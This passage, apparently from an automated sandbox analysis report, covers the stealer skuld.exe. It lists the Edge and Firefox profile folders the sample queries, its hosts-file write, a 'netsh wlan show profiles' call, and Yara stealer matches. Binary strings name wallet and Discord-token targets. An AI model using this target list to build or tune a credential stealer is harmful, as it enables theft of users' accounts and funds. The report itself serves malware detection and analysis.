                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Fre VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Speech Recognition VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Web Notifications Deny List VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\bookmarkbackups VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\crashes VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\crashes\events VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting\archived VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting\archived\2023-10 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting\glean\tmp VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\minidumps VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\saved-telemetry-pings VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\security_state VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\sessionstore-backups VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\default VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\2918063365piupsah.files VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\temporary VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\to-be-removed VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Temp\vw7TwX1TN1 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        Source: C:\Users\user\Desktop\skuld.exe | File written: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\Desktop\skuld.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

                        Stealing of Sensitive Information

                        Source: Yara match | File source: skuld.exe, type: SAMPLE
                        Source: Yara match | File source: 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: skuld.exe PID: 7148, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, type: DROPPED
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: %s profiles/invitesBytecoinEthereumElectrum%s\%s\%sCoinbaseCrocobitMetamaskStarcoinProgramsapp.asarGoStringFullPathno anodeCancelIoReadFileAcceptExWSAIoctlshutdownfile[%d]usernameicon_url%s:%d:%sbad instomitzerokernel32hijackedNO_ERRORPRIORITYSETTINGSLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflict48828125infinitystrconv.parsing ParseIntcompressEqualSidSetEventIsWindowrecvfromnil PoolscavengepollDescsynctesttraceBufdeadlockraceFinipanicnilcgocheckrunnablerax rbx rcx rdx rdi rsi rbp rsp r8 r9 r10 r11 r12 r13 r14 r15 rip rflags cs fs gs is not pointer packed=BAD RANK status unknown(trigger= npages= nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes status= etypes wsaioctlThursdaySaturdayFebruaryNovemberDecember%!Month(ZONEINFOArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqinetedns0[::1]:53continue_gatewayinvalid address readfromunixgram
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: - `` - Jaxx%s%sCoreEverMathNamiTrontruefilereadopensyncpipelinkStatquitbindidle.com.exe.bat.cmdUUIDPOSTtext asn1nullbooljson'\''Host&lt;&gt;http1080DATAPINGEtag0x%xdateetagfromhostvaryDategzip%x
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: pacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valueselectgo: bad wakeupsemaRoot rotateRightreflect.makeFuncStubtrace: out of memorywirep: already in gotime: invalid numberJordan Standard TimeArabic Standard TimeIsrael Standard TimeTaipei Standard TimeAzores Standard TimeTurkey Standard TimeEgyptian_HieroglyphsMeroitic_Hieroglyphsinvalid DNS responsegetadaptersaddressesunexpected network: form-data; name="%s"EnterCriticalSectionGetFileAttributesExALeaveCriticalSectionSystemTimeToFileTimeGetSidLengthRequiredenter-recursive-loopnumber has no digitsexpression too largeinvalid repeat countBad chunk length: %dbad palette length: invalid image size: unknown PSK identitycertificate requiredgzip: invalid headerheader line too longx509usefallbackrootsmissing IPv6 addressunexpected characterflate: closed writersha3: Sum after Readzlib: invalid headergetCert can't be nilinvalid UTF-8 stringx509: malformed spkiunsupported suite IDinvalid integer typeSafeArrayDestroyDataSafeArrayGetElemsizesystemexplorerserviceSystemParametersInfoWwin32_VideoController-SubmitSamplesConsentcore.asar not in bodyDiscordTokenProtectordiscordtokenprotectorProtectionPayload.dllintegrity_checkmoduleUbisoft Game LauncherTous les utilisateurs\Exodus\exodus.walletreflect.Value.Complextrace/breakpoint trapuser defined signal 1user defined signal 2link has been severedpackage not installedblock device requiredstate not recoverableread-only file systemstale NFS file handleReadDirectoryChangesWNetGetJoinInformationLookupPrivilegeValueWAdjustTokenPrivilegesexec: already startedunsupported operationinternal error: rc %dsequence tag mismatchafter top-level valuein string escape codekey is not comparableclipboard 
